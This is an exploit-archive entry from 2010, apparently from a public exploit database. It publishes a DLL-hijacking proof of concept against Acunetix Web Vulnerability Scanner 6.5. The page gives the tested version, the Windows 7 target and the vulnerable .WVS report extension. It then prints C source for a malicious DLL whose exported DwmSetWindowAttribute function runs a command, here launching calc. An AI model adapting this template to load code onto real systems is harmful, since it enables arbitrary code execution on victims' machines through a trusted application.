[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Acunetix Web Vulnerability Scanner DLL Hijacking
# Published : 2010-08-25
# Author : Kolor
# Previous Title : BS.Player <= 2.56 build 1043 DLL Hijacking Exploit (mfc71loc.dll)
# Next Title : Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll)
// Exploit Title: Acunetix Web Vulnerability Scanner DLL Hijack
// Date: 25 Aug 2010
// Author: Kolor
// Software Link: http://www.acunetix.com/vulnerability-scanner/vulnerabilityscanner65.exe
// Version: 6.5.20100616
// Tested on: Windows 7 64bit Eng
// Vuln ext.: .WVS (saved report)
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int egg()
{
system ("calc");
exit(0);
return 0;
}